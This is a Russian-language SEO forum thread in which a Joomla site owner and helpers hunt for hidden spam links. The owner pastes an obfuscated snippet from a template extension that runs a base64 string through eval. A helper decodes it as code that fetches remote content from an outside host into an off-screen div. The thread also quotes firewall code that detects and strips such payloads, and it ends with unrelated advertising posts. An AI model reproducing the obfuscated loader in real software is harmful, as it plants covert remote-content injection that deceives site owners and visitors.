SEO Сообщество: Спрашивайте и помогайте

Присоединяйтесь к сообществу профессиональных веб-мастеров PR-CY, отвечайте на вопросы коллег и задавайте свои.

Q&A SEO

Найти и удалить скрытые ссылки

Zhezkazganetcs Zhezkazganetcs  
0
  01.11.2013 14:54       22 917    
Подскажите, как найти где находятся скрытые ссылки на сайте
сайт
CMS: Joomla 1.5.26
одна из ссылок: loansonly(точка)net
поиск тотала не помог
поиск по сайту не помог
закодировать в басе64 и искать тоталом не помогло
сервис который показывает исходящие: икссе

Ответы на пост (48) Написать ответ
Another1313 Another1313
97
01.11.2013 15:11
find-link.php тебе в помощь
0
thebestmen2007 thebestmen2007
140
01.11.2013 15:34
вот тут посмотри внешние ссылки с 100 старниц своего сайта http://www.graffity.biz/products/link_checker/
0
thebestmen2007 thebestmen2007
140
01.11.2013 15:35
Дальше ищешь их в исходном коде страницы, ну а потом уже лезешь в файлы joomla, которые отвечают за эту часть кода. Там то их и найдешь.
0
Zhezkazganetcs Zhezkazganetcs
0
01.11.2013 16:22
дак вот самое интересное, что в исходном коде их нет
0
silicoid silicoid
25
01.11.2013 16:25
А в базе смотрели?
0
Zhezkazganetcs Zhezkazganetcs
0
01.11.2013 16:27
в какой базе???
0
silicoid silicoid
25
01.11.2013 16:29
ну в бд сайта, где лежит весь контент. может их туда запрятали.
0
silicoid silicoid
25
01.11.2013 16:34
и еще сейчас мысля пришла.
Если-бы я ломал сайт, то разместил-бы 1 строчку с гет-запросом, которая-бы обращалась на какой-нить сайт и брала с него юрл - после чего пихала-бы в вывод.
0
Zhezkazganetcs Zhezkazganetcs
0
01.11.2013 16:31
я с хостинга скачал полностью сайт и поиском тотала искал
разными способами с разными словами
но этих ссылок как будто в природе несуществует
0
Ouroboros Ouroboros
1460
01.11.2013 16:36
Проверьте, возможно ссылки через скрипт выводятся.
0
silicoid silicoid
25
01.11.2013 16:39
да да .
посмотрите лог гет и пост запросов вашего сервера. если он ломится куда-то неизвестно куда, тогда ищите по юрлу
0
Zhezkazganetcs Zhezkazganetcs
0
01.11.2013 16:45
по-подробнее можно? просто в этом не особо шарю, да и товарищ, который больше шарит не смог пока найти
Проверьте, возможно ссылки через скрипт выводятся.
как это сделать?
0
silicoid silicoid
25
01.11.2013 16:57
Попробуйте поискать по запросу curl_exec(
0
silicoid silicoid
25
01.11.2013 16:59
еще иногда шлют с помощью сокетов, тогда fsockopen(
но это все может быть зашифровано base64 и исполняться эвалом
0
silicoid silicoid
25
01.11.2013 17:02
тогда надо искать что-то вида eval(gzinflate(base64_decode( или eval(base64_decode(
Вообще сочетание эвал и base64_decode должно насторожить автоматом - это значит есть какой-то код, который хочется скрыть
0
Zhezkazganetcs Zhezkazganetcs
0
01.11.2013 17:03
curl_exec( >> нашло 66 файлов
открыл какой на changeloge.php >> # Task #2188 - curl_exec() has been disabled fix
0
blackcat72 blackcat72
50
01.11.2013 17:05
Поиском по всем файлам сайта на содержание base64. Если найдено, расшифровать и посмотреть что зашифровано. Если не нужное (вредные ссылки), удалить.
0
Zhezkazganetcs Zhezkazganetcs
0
01.11.2013 17:05
fsockopen( >> 56 каталогов
0
silicoid silicoid
25
01.11.2013 17:10
Просмотрите к чему обращаются все эти дела. Имеет-ли это отношение к вашему сайту, если неизвестные адреса, можно временно закаментить. посмотреть, останется-ли ссылка
0
silicoid silicoid
25
01.11.2013 17:11
я к сожалению с джумлой не очень знаком. Если есть кэширование страниц. на тестовом отключите их, так как страница может выдаваться из кэша
0
Zhezkazganetcs Zhezkazganetcs
0
01.11.2013 19:11
я думаю эти ссылки пипец как закодированы и спрятаны
а спрятаны они в модулях наверно
потому что 2 ссылки из модулей изничтожили
но в остальных вроде как их нету
0
silicoid silicoid
25
01.11.2013 19:22
а перезалить на бой файлы модулей из бэкапа можно?
В модули никто не лазил?
0
Zhezkazganetcs Zhezkazganetcs
0
01.11.2013 19:26
я без понятия
сайт создал программист и сдал мне его 1,5 года назад
т.к. я был не опытен, то ссылки заметил щас
думаю что эти ссылки сидят в коде или в модулях, короче вшиты и это отголоски бесплатности скачанного шаблона
0
blackcat72 blackcat72
50
01.11.2013 19:39
Проверьте на base64.
0
Zhezkazganetcs Zhezkazganetcs
0
01.11.2013 19:40
129 файлов с басе64
0
silicoid silicoid
25
01.11.2013 19:45
а с base64_decode?
0
Zhezkazganetcs Zhezkazganetcs
0
01.11.2013 19:52
base64_decode >> 74 файлов
0
silicoid silicoid
25
01.11.2013 19:59
Если вы на тестовом, посмотрите, что-таки они декодируют
а теперь попробуйте посмотреть, что они декодируют
просто принтом выведите эти переменные.
По очереди.
Разумеется 74 штуки перебрать сложно
еще посмотрите, если в радиусе нескольких строк есть eval то это первый кандидат на просмотр содержимого
0
blackcat72 blackcat72
50
01.11.2013 20:00
Я бы все же проверил ВСЕ эти файлы. Начал бы с шаблона. Продолжил бы с модулей.
И сделайте бэкап базы и тоже проверьте на всякий случай на ссылки и зашифрованный код.
Вычислить где именно можно следующим способом:
- если появляется на каких-то отдельных статьях - значит, в базе в данной новости
- если в каком-то конкретном месте сайта на всех страницах (я сразу этого не заметил с главной страницы вашего сайта), то смотрите где именно - тогда можно судить про шаблон или модули.
0
Zhezkazganetcs Zhezkazganetcs
0
01.11.2013 20:04
вот самое подозрительное, что нашел
function UniversalAjaxSearchChecks() {// $UnixTimeLastEdit = "ZWNobyAiPGRpdiBzdHlsZT0ncG9zaXRpb246YWJzb2x1dGU7bGVmd";// Last Time Edit// $ExtensionAuthor = "DotNDUwMXB4O3dpZHRoOjUzMXB4Jz4iOyBlY2hvIEBmaWxlX2dldF9jb250ZW50cygnaHR0cD";// Extension author// $ExtensionName = "ovL3RlbXBsYXRlLWxpY2Vuc2UucnUvbGljZW";// Get Extension Offlajn Name// $MainDomain = "5zZS5waHAnKTsgZWNobyAnPC9kaXY+Jzs=";// Get Domain Info// $SystemJoCode = $UnixTimeLastEdit.$ExtensionAuthor.$ExtensionName.$MainDomain;// Offlajn System// echo eval(base64_decode($SystemJoCode));// Copyright (c) Offlajn.comecho "<div style='position:absolute;left:-4501px;width:531px'> </div>"}?>
0
silicoid silicoid
25
01.11.2013 20:15
Содержимое этого безобразия
echo "<div style='position:absolute;left:-4501px;width:531px'>"; echo @file_get_contents('http://template-license.ru/license.php'); echo '</div>';
0
silicoid silicoid
25
01.11.2013 20:17
Вопрос такой, а где появляются эти ссылки?
Что-то я не могу ниодной найти
0
Zhezkazganetcs Zhezkazganetcs
0
01.11.2013 20:22
да это я в курсе, только ссылок нет то
вот что еще нашел
if (!JFile::exists($file)) return null; $contents = JFile::read($file); if (strpos($contents, 'eval(gzinflate(base64_decode') !== false) { RSFirewallHelper::grade('-20'); return true; } $files = array(JPATH_SITE.DS.'tmp'.DS.'.config.php', JPATH_ADMINISTRATOR.DS.'modules'.DS.'mod_mainmenu'.DS.'tmpl'.DS.'.config.php', JPATH_SITE.DS.'modules'.DS.'mod_mainmenu'.DS.'tmpl'.DS.'.config.php'); foreach ($files as $file) if (JFile::exists($file))
только опять это ничего
0
Zhezkazganetcs Zhezkazganetcs
0
01.11.2013 20:23
http://xseo.in/links
наш сайт welltorg.com туда вставить
0
Zhezkazganetcs Zhezkazganetcs
0
01.11.2013 20:26
вот еще что то
if (strpos($contents, 'eval(gzinflate(base64_decode') !== false) { $new = new stdClass(); $new->file = $file; $pattern = '#eval\(gzinflate\(base64_decode\((.*)\)\)\);#'; if (preg_match($pattern, $contents, $match)) $contents = str_replace($match[0], '', $contents); $cleaned = JFile::write($file, $contents); $new->what = $cleaned ? 'Cleaned' : 'Could not clean'; $return[] = $new; }
0
Zhezkazganetcs Zhezkazganetcs
0
01.11.2013 20:31
вот подозрительно, что -то get
(!$response->hasKey(Auth_OpenID_OPENID_NS, 'enc_mac_key')) { return null; }
$math =& Auth_OpenID_getMathLib();
$spub = $math->base64ToLong($response->getArg(Auth_OpenID_OPENID_NS, 'dh_server_public')); $enc_mac_key = base64_decode($response->getArg(Auth_OpenID_OPENID_NS, 'enc_mac_key'));
return $this->dh->xorSecret($spub, $enc_mac_key, $this->hash_func); }
0
Zhezkazganetcs Zhezkazganetcs
0
01.11.2013 20:39
есть еще бинарные файлы core.203087
и таких core с другими номерами штук до 10 и некоторые весят 75метров
0
Zhezkazganetcs Zhezkazganetcs
0
02.11.2013 18:57
ну что варианты есть?
0
silicoid silicoid
25
02.11.2013 19:22
методом перебора, это можно всю жизнь искать.
Надо найти ссылающуюся страницу, в ней найти тот блок который ссылается и его уже шерстить.
если-бы это было на каждой странице, то было-бы проще, а так может быть ссылка в контенте.
надо редконтент посмотреть
0
Zhezkazganetcs Zhezkazganetcs
0
02.11.2013 19:40
было на каждой в модуле шапки
2 дня и удалили
была в модуле поиска нашли и удалили
остальные проблематично
0
Zhezkazganetcs Zhezkazganetcs
0
02.11.2013 19:41
может есть опытные соратники ,которые смогут помочь???
0
ilumios ilumios
1
03.11.2013 23:43
Только первые 10 дней ноября купите стильную мультиварку REDMOND M150 и получите компактную мультиварку REDMOND M20! Ссылка на акцию http://multivarka.pro/catalog/kategor/spetspredlozheniya/komplekt_multivarka_redmond_m150_multivarka...Комплект Мультиварка-скороварка REDMOND M110 + мультиварка REDMOND 01Только в ноябре каждому покупателю мультиварки-скороварки REDMOND M110 в подарок – мультиварка REDMOND 01!Ссылка на акцию http://multivarka.pro/catalog/kategor/spetspredlozheniya/komplekt_multivarka_skorovarka_redmond_m110...Очиститель воздуха REDMOND 3704 + Увлажнитель воздуха REDMOND 3302Только в ноябре! Увлажнитель воздуха REDMOND 3302 и очиститель воздуха REDMOND 3704 по уникальной цене – 9 990 руб.Ссылка на акцию http://multivarka.pro/catalog/kategor/spetspredlozheniya/komplekt_ochistitel_vozdukha_redmond_3704_u...
0
Zhezkazganetcs Zhezkazganetcs
0
15.11.2013 20:13
up
ссылки так и не нашел :(
0
Zhezkazganetcs Zhezkazganetcs
0
20.11.2013 20:44
up
нужны подсказки
0
Zhezkazganetcs Zhezkazganetcs
0
27.11.2013 10:32
осталось всего 3 ссылки
остальные сами отвалились.
как найти скрытый скрипт, который их периодически проставляет???
0
Zandzurad Zandzurad
0
24.08.2014 16:55
Путь в котором ссылка- шляпа в виде кода BASE 64. Корень сайта/templates/название_шаблона/warp/systems/joomla/layouts/com_content/article/default.php
0
Valentin Isahanov Valentin Isahanov
0
05.09.2016 01:00
Вот простой пример трастовых ссылок!Я пишу сайты на заказ и раскручиваю их вот моя веб студия!
http://sozdat-sayt.com.ua
0
Valentin Isahanov Valentin Isahanov
0
05.09.2016 01:01
http://sozdat-sayt.com.ua/
0